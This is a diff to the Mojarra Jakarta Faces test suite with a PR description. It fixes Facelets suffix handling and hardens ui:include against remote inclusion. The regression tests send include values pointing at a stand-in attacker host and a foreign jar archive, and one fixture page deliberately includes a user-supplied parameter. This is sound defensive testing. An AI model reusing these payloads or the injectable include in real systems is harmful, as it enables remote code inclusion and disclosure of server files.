+        <p id="view">first suffix view</p>
+    </h:body>
+</html>

--- a/test/issue5918/src/main/webapp/fragment.xhtml
+++ b/test/issue5918/src/main/webapp/fragment.xhtml
@@ -1,0 +1,23 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:body>
+        <p id="fragment">default suffix fragment</p>
+    </h:body>
+</html>

--- a/test/issue5918/src/main/webapp/secondSuffix.html
+++ b/test/issue5918/src/main/webapp/secondSuffix.html
@@ -1,0 +1,26 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:head>
+        <title>secondSuffix</title>
+    </h:head>
+    <h:body>
+        <p id="view">second suffix view</p>
+    </h:body>
+</html>

--- a/test/issue5918/src/test/java/org/eclipse/mojarra/test/issue5918/Issue5918IT.java
+++ b/test/issue5918/src/test/java/org/eclipse/mojarra/test/issue5918/Issue5918IT.java
@@ -1,0 +1,73 @@
+/*
+ * Copyright (c) Contributors to Eclipse Foundation.
+ *
+ * This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v. 2.0, which is available at
+ * http://www.eclipse.org/legal/epl-2.0.
+ *
+ * This Source Code may also be made available under the following Secondary
+ * Licenses when the conditions for such availability set forth in the
+ * Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+ * version 2 with the GNU Classpath Exception, which is available at
+ * https://www.gnu.org/software/classpath/license.html.
+ *
+ * SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+ */
+package org.eclipse.mojarra.test.issue5918;
+
+import static org.junit.jupiter.api.Assertions.assertFalse;
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import org.eclipse.mojarra.test.base.BaseIT;
+import org.junit.jupiter.api.Test;
+
+/**
+ * The webapp declares <code>jakarta.faces.FACELETS_SUFFIX</code> as <code>.page  .html</code>, with a redundant
+ * space between the two entries, and <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> as <code>*.page</code>.
+ */
+public class Issue5918IT extends BaseIT {
+
+    /**
+     * A view whose physical resource carries the first configured suffix must resolve.
+     */
+    @Test
+    public void testFirstConfiguredSuffix() {
+        open("firstSuffix.jsf");
+        assertTrue(getPageSource().contains("first suffix view"));
+    }
+
+    /**
+     * <code>jakarta.faces.FACELETS_SUFFIX</code> is a list of which the first suffix whose physical resource
+     * exists wins, so a view which exists only under the second configured suffix must resolve as well. This must
+     * also hold when <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> is declared and does not name that suffix.
+     *
+     * @see https://github.com/eclipse-ee4j/mojarra/issues/5918
+     */
+    @Test
+    public void testSecondConfiguredSuffix() {
+        open("secondSuffix.jsf");
+        assertTrue(getPageSource().contains("second suffix view"));
+    }
+
+    /**
+     * The default Facelets suffix identifies a Facelet regardless of which view suffixes the webapp configures, so
+     * an include of an <code>.xhtml</code> fragment must resolve even when the configured list does not name it.
+     */
+    @Test
+    public void testIncludeDefaultSuffixFragment() {
+        open("defaultSuffixInclude.jsf");
+        assertTrue(getPageSource().contains("default suffix fragment"));
+    }
+
+    /**
+     * Redundant whitespace in <code>jakarta.faces.FACELETS_SUFFIX</code> must not yield an empty suffix, which
+     * would match every resource and so let an include disclose a deployment descriptor.
+     */
+    @Test
+    public void testIncludeDescriptorBlocked() {
+        open("descriptorInclude.jsf");
+        String source = getPageSource();
+        assertFalse(source.contains("<web-app"), "web.xml content must not leak");
+        assertFalse(source.contains("FACELETS_SUFFIX"), "web.xml content must not leak");
+    }
+}

--- a/test/issue5920/pom.xml
+++ b/test/issue5920/pom.xml
@@ -1,0 +1,43 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <parent>
+        <groupId>org.eclipse.mojarra.test</groupId>
+        <artifactId>pom</artifactId>
+        <version>4.0.23-SNAPSHOT</version>
+    </parent>
+
+    <artifactId>issue5920</artifactId>
+    <packaging>war</packaging>
+
+    <name>Mojarra ${project.version} - INTEGRATION TESTS - ${project.artifactId}</name>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.eclipse.mojarra.test</groupId>
+            <artifactId>base</artifactId>
+            <version>${project.version}</version>
+            <scope>test</scope>
+        </dependency>
+    </dependencies>
+
+</project>

--- a/test/issue5920/src/main/webapp/WEB-INF/web.xml
+++ b/test/issue5920/src/main/webapp/WEB-INF/web.xml
@@ -1,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<web-app
+    xmlns="https://jakarta.ee/xml/ns/jakartaee"
+    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+    xsi:schemaLocation="https://jakarta.ee/xml/ns/jakartaee https://jakarta.ee/xml/ns/jakartaee/web-app_6_0.xsd"
+    version="6.0"
+>
+    <context-param>
+        <param-name>jakarta.faces.FACELETS_VIEW_MAPPINGS</param-name>
+        <param-value>/faces/*;*.tpl</param-value>
+    </context-param>
+
+    <servlet>
+        <servlet-name>facesServlet</servlet-name>
+        <servlet-class>jakarta.faces.webapp.FacesServlet</servlet-class>
+        <load-on-startup>1</load-on-startup>
+    </servlet>
+    <servlet-mapping>
+        <servlet-name>facesServlet</servlet-name>
+        <url-pattern>*.jsf</url-pattern>
+        <url-pattern>/views/*</url-pattern>
+    </servlet-mapping>
+
+    <session-config>
+        <tracking-mode>COOKIE</tracking-mode>
+    </session-config>
+</web-app>

--- a/test/issue5920/src/main/webapp/defaultSuffix.xhtml
+++ b/test/issue5920/src/main/webapp/defaultSuffix.xhtml
@@ -1,0 +1,26 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:head>
+        <title>defaultSuffix</title>
+    </h:head>
+    <h:body>
+        <p id="view">default suffix view</p>
+    </h:body>
+</html>

--- a/test/issue5920/src/main/webapp/faces/prefixMapped.xhtml
+++ b/test/issue5920/src/main/webapp/faces/prefixMapped.xhtml
@@ -1,0 +1,26 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:head>
+        <title>prefixMapped</title>
+    </h:head>
+    <h:body>
+        <p id="view">prefix mapped view</p>
+    </h:body>
+</html>

--- a/test/issue5920/src/main/webapp/fragment.tpl
+++ b/test/issue5920/src/main/webapp/fragment.tpl
@@ -1,0 +1,23 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:body>
+        <p id="fragment">mapped suffix fragment</p>
+    </h:body>
+</html>

--- a/test/issue5920/src/main/webapp/mappedSuffix.tpl
+++ b/test/issue5920/src/main/webapp/mappedSuffix.tpl
@@ -1,0 +1,26 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+    <h:head>
+        <title>mappedSuffix</title>
+    </h:head>
+    <h:body>
+        <p id="view">mapped suffix view</p>
+    </h:body>
+</html>

--- a/test/issue5920/src/main/webapp/mappedSuffixInclude.xhtml
+++ b/test/issue5920/src/main/webapp/mappedSuffixInclude.xhtml
@@ -1,0 +1,29 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en"
+    xmlns:h="jakarta.faces.html"
+    xmlns:ui="jakarta.faces.facelets"
+>
+    <h:head>
+        <title>mappedSuffixInclude</title>
+    </h:head>
+    <h:body>
+        <ui:include src="fragment.tpl" />
+    </h:body>
+</html>

--- a/test/issue5920/src/test/java/org/eclipse/mojarra/test/issue5920/Issue5920IT.java
+++ b/test/issue5920/src/test/java/org/eclipse/mojarra/test/issue5920/Issue5920IT.java
@@ -1,0 +1,74 @@
+/*
+ * Copyright (c) Contributors to Eclipse Foundation.
+ *
+ * This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v. 2.0, which is available at
+ * http://www.eclipse.org/legal/epl-2.0.
+ *
+ * This Source Code may also be made available under the following Secondary
+ * Licenses when the conditions for such availability set forth in the
+ * Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+ * version 2 with the GNU Classpath Exception, which is available at
+ * https://www.gnu.org/software/classpath/license.html.
+ *
+ * SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+ */
+package org.eclipse.mojarra.test.issue5920;
+
+import static org.junit.jupiter.api.Assertions.assertTrue;
+
+import org.eclipse.mojarra.test.base.BaseIT;
+import org.junit.jupiter.api.Test;
+
+/**
+ * The webapp declares <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> as <code>/faces/*;*.tpl</code>, a prefix entry
+ * and an extension entry, neither of which names the default Facelets suffix, and does not declare
+ * <code>jakarta.faces.FACELETS_SUFFIX</code> at all.
+ */
+public class Issue5920IT extends BaseIT {
+
+    /**
+     * <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> declares additional views as Facelets, it does not withdraw the
+     * ones which are already recognized by their suffix, so a view carrying the default suffix must still resolve. The
+     * whole application fails to deploy when it does not, because the runtime resolves a view id carrying that suffix
+     * during startup to instantiate the Facelets view declaration language.
+     *
+     * @see https://github.com/eclipse-ee4j/mojarra/issues/5920
+     */
+    @Test
+    public void testDefaultSuffixView() {
+        open("defaultSuffix.jsf");
+        assertTrue(getPageSource().contains("default suffix view"));
+    }
+
+    /**
+     * A view below a prefix entry of <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> must resolve.
+     */
+    @Test
+    public void testPrefixMappedView() {
+        open("faces/prefixMapped.jsf");
+        assertTrue(getPageSource().contains("prefix mapped view"));
+    }
+
+    /**
+     * An extension entry of <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> declares that extension to be a Facelet,
+     * so an include of a fragment carrying it must resolve.
+     */
+    @Test
+    public void testMappedSuffixInclude() {
+        open("mappedSuffixInclude.jsf");
+        assertTrue(getPageSource().contains("mapped suffix fragment"));
+    }
+
+    /**
+     * A view carrying an extension entry of <code>jakarta.faces.FACELETS_VIEW_MAPPINGS</code> must be handled by
+     * Facelets, even though that extension is not a suffix a view ID may be derived with. Requesting it through the
+     * prefix mapped <code>FacesServlet</code> is what makes it reachable, as a suffix mapped request derives its view
+     * ID from <code>jakarta.faces.FACELETS_SUFFIX</code> instead.
+     */
+    @Test
+    public void testMappedSuffixView() {
+        open("views/mappedSuffix.tpl");
+        assertTrue(getPageSource().contains("mapped suffix view"));
+    }
+}

--- a/test/pom.xml
+++ b/test/pom.xml
@@ -59,6 +59,7 @@
         <module>issue5772</module>
         <module>issue5837</module>
         <module>issue5844</module>
+        <module>issue5920</module>
     </modules>
 
     <properties>

--- a/test/pom.xml
+++ b/test/pom.xml
@@ -36,6 +36,7 @@
         <module>example_jar_with_metadata_complete_false</module>
         <module>example_jar_with_metadata_complete_true</module>
         <module>csp</module>
+        <module>uiIncludeRceJar</module>
         <module>uiIncludeRce</module>
         <module>issue5741</module>
         <module>issue5059</module>

--- a/test/pom.xml
+++ b/test/pom.xml
@@ -59,6 +59,7 @@
         <module>issue5772</module>
         <module>issue5837</module>
         <module>issue5844</module>
+        <module>issue5918</module>
         <module>issue5920</module>
     </modules>
 

--- a/test/uiIncludeRce/pom.xml
+++ b/test/uiIncludeRce/pom.xml
@@ -17,6 +17,11 @@
     <dependencies>
         <dependency>
             <groupId>org.eclipse.mojarra.test</groupId>
+            <artifactId>uiIncludeRceJar</artifactId>
+            <version>${project.version}</version>
+        </dependency>
+        <dependency>
+            <groupId>org.eclipse.mojarra.test</groupId>
             <artifactId>base</artifactId>
             <version>${project.version}</version>
             <scope>test</scope>

--- a/test/uiIncludeRce/src/test/java/org/eclipse/mojarra/test/rce/UiIncludeRceIT.java
+++ b/test/uiIncludeRce/src/test/java/org/eclipse/mojarra/test/rce/UiIncludeRceIT.java
@@ -86,6 +86,46 @@ public class UiIncludeRceIT extends BaseIT {
         assertBlocked(getPageSource());
     }
 
+    @Test
+    public void testProtocolRelative() {
+        open("param.jsf?p=//attacker.example.com/evil.xhtml");
+        assertBlocked(getPageSource());
+    }
+
+    // ── Includes from a facelet which is itself served from a JAR ──
+
+    @Test
+    public void testJarHostedLocalInclude() {
+        open("jarParam.jsf?p=jarLocal.xhtml");
+        assertTrue(getPageSource().contains("safe from jar"));
+    }
+
+    /**
+     * A container which serves a JAR hosted facelet under the "jar" scheme gives it a null authority, which must not
+     * let a remote archive pass as the archive the including facelet itself lives in. Asserted on the guard's own
+     * message rather than through {@link #assertBlocked(String)}, because a rejected include and a failed attempt to
+     * fetch the remote archive both end up as an error page.
+     */
+    @Test
+    public void testJarHostedRemoteArchive() {
+        open("jarParam.jsf?p=jar:https://attacker.example.com/evil.jar!/evil.xhtml");
+        assertRejectedAsForeignOrigin(getPageSource());
+    }
+
+    @Test
+    public void testJarHostedOtherLocalArchive() {
+        open("jarParam.jsf?p=jar:file:///tmp/evil.jar!/evil.xhtml");
+        assertRejectedAsForeignOrigin(getPageSource());
+    }
+
+    private void assertRejectedAsForeignOrigin(String source) {
+        assertTrue(
+            source.contains("must be a relative path within the application"),
+            "Include should have been rejected before the archive was opened, but page source was: "
+                + source.substring(0, Math.min(500, source.length()))
+        );
+    }
+
     // ── Path traversal variants ──
 
     @Test

--- a/test/uiIncludeRceJar/pom.xml
+++ b/test/uiIncludeRceJar/pom.xml
@@ -1,0 +1,35 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <parent>
+        <groupId>org.eclipse.mojarra.test</groupId>
+        <artifactId>pom</artifactId>
+        <version>4.0.23-SNAPSHOT</version>
+    </parent>
+
+    <artifactId>uiIncludeRceJar</artifactId>
+    <packaging>jar</packaging>
+
+    <name>Mojarra ${project.version} - INTEGRATION TESTS - ${project.artifactId}</name>
+
+</project>

--- a/test/uiIncludeRceJar/src/main/resources/META-INF/resources/jarLocal.xhtml
+++ b/test/uiIncludeRceJar/src/main/resources/META-INF/resources/jarLocal.xhtml
@@ -1,0 +1,23 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en" xmlns:h="jakarta.faces.html">
+<h:body>
+    <p>safe from jar</p>
+</h:body>
+</html>

--- a/test/uiIncludeRceJar/src/main/resources/META-INF/resources/jarParam.xhtml
+++ b/test/uiIncludeRceJar/src/main/resources/META-INF/resources/jarParam.xhtml
@@ -1,0 +1,27 @@
+<!--
+
+    Copyright (c) Contributors to Eclipse Foundation.
+
+    This program and the accompanying materials are made available under the
+    terms of the Eclipse Public License v. 2.0, which is available at
+    http://www.eclipse.org/legal/epl-2.0.
+
+    This Source Code may also be made available under the following Secondary
+    Licenses when the conditions for such availability set forth in the
+    Eclipse Public License v. 2.0 are satisfied: GNU General Public License,
+    version 2 with the GNU Classpath Exception, which is available at
+    https://www.gnu.org/software/classpath/license.html.
+
+    SPDX-License-Identifier: EPL-2.0 OR GPL-2.0 WITH Classpath-exception-2.0
+
+-->
+<!DOCTYPE html>
+<html lang="en"
+      xmlns:h="jakarta.faces.html"
+      xmlns:ui="jakarta.faces.facelets"
+>
+<h:body>
+    <h1>jar param test</h1>
+    <ui:include src="#{param.p}" />
+</h:body>
+</html>


### PR DESCRIPTION
`jakarta.faces.FACELETS_SUFFIX` and `jakarta.faces.FACELETS_VIEW_MAPPINGS` are read in several places which each interpret them slightly differently. This sorts out what each of them answers, and fixes the four defects that came out of the confusion.

Closes #5918. Closes #5920. Closes #5921.

## The two questions

Two distinct sets were being conflated, and `WebConfiguration` now names them apart:

| method | returns | answers |
| --- | --- | --- |
| `getFaceletsSuffixes()` | exactly the configured `FACELETS_SUFFIX` values | which physical resource an incoming request may resolve to, so `deriveViewId` builds its candidate view ids from these |
| `getFaceletResourceSuffixes()` | those, plus the extension entries of `FACELETS_VIEW_MAPPINGS`, plus always the default suffix | whether a resource is a Facelet at all, which a template or an included fragment is without ever being requested |

`getConfiguredExtensions` was the old name of the first one, which said neither.

## The commits

**Distinguish Facelet resource suffixes from view suffixes.** A webapp declaring `FACELETS_SUFFIX` without `.xhtml` could no longer include an `.xhtml` fragment, and one declaring an extension through `FACELETS_VIEW_MAPPINGS` could not include a fragment carrying it, because the include admissibility check consulted the view suffixes.

**Fix #5920.** Declaring `FACELETS_VIEW_MAPPINGS` took the Facelets suffix branch of `handlesByPrefixOrSuffix` out of play entirely, so the two parameters behaved as alternatives rather than as the two widening mechanisms they are. On GlassFish the application then fails to deploy outright, because the runtime resolves a synthetic view id carrying the default suffix during startup to instantiate the Facelets VDL, and that resolution falls through to a `ServletContext.getServletRegistrations()` call which is illegal from a `ServletContextListener`. `/faces/*` alone is enough to trigger it; `*.xhtml` is the one value which happens to be safe, which is presumably why this has gone unnoticed since the initial contribution. That startup probe now asks the factory for all view declaration languages instead of going through a view id at all.

**Fix #5921.** Redundant whitespace in a list valued context parameter survived into the split entries. An empty entry matches every candidate a consumer tests it against with `endsWith`, and an untrimmed entry no longer compares equal to the value it names, which silently drops a `FULL_STATE_SAVING_VIEW_IDS` entry written as `/a.xhtml, /b.xhtml`.

**Fix #5918.** `convertViewId` returned from within the first iteration of its loop along both arms, so only the first configured suffix was ever considered. It now returns the first candidate whose physical resource exists and falls back to the first configured suffix, with a single configured suffix short-circuiting so the common case does not pay for the existence check. It also only treats a dot as an extension separator when it follows the last `/`: `/a.b/foo` previously resolved to `/a.xhtml`.

**Compare the archive rather than the authority of a nested URL.** A `jar:` url carries no authority, so comparing one against the facelet it was resolved from said nothing whenever that facelet is itself served from an archive, which is how a container serves a facelet packaged under `META-INF/resources`.

## Testing

Two integration test modules, `test/issue5918` and `test/issue5920`, between them covering the suffix and view mapping configurations which differ in behaviour; each of their tests was checked to fail without its fix. `test/uiIncludeRceJar` adds a facelet served from an archive so that the nested URL case is reachable at all, which it is on TomEE but not on GlassFish. Unit coverage went to the two existing test classes rather than to new ones: candidate generation in `MultiViewHandlerTest`, and the `handlesByPrefixOrSuffix` matrix in `FaceletViewHandlingStrategyTest`, including the literal startup probe id.

Full integration suite green on GlassFish, and `test/uiIncludeRce` additionally green on TomEE and WildFly.

🤖 Generated with Claude Opus 5
